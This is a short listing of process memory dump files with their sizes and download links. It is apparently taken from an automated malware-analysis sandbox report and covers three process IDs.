memory/640-0-0x00000000029E0000-0x0000000002A16000-memory.dmp

Filesize
216KB

Download
memory/640-14-0x0000000005E60000-0x00000000061B4000-memory.dmp

Filesize
3.3MB

Download
memory/640-22-0x0000000006870000-0x0000000006892000-memory.dmp

Filesize
136KB

Download
memory/640-1-0x00000000055C0000-0x0000000005BE8000-memory.dmp

Filesize
6.2MB

Download
memory/640-16-0x0000000006370000-0x00000000063BC000-memory.dmp

Filesize
304KB

Download
memory/640-2-0x0000000005380000-0x00000000053A2000-memory.dmp

Filesize
136KB

Download
memory/640-15-0x0000000006320000-0x000000000633E000-memory.dmp

Filesize
120KB

Download
memory/640-3-0x0000000005C60000-0x0000000005CC6000-memory.dmp

Filesize
408KB

Download
memory/640-23-0x0000000007AE0000-0x0000000008084000-memory.dmp

Filesize
5.6MB

Download
memory/640-20-0x00000000068A0000-0x0000000006936000-memory.dmp

Filesize
600KB

Download
memory/640-21-0x0000000006820000-0x000000000683A000-memory.dmp

Filesize
104KB

Download
memory/640-4-0x0000000005CD0000-0x0000000005D36000-memory.dmp

Filesize
408KB

Download
memory/1604-116-0x00000000044E0000-0x0000000004545000-memory.dmp

Filesize
404KB

Download
memory/1604-72-0x0000000003F20000-0x0000000003FA5000-memory.dmp

Filesize
532KB

Download
memory/1604-17-0x0000000010000000-0x00000000105D3000-memory.dmp

Filesize
5.8MB

Download
memory/4480-60-0x000001C1F9F40000-0x000001C1F9F62000-memory.dmp

Filesize
136KB

Download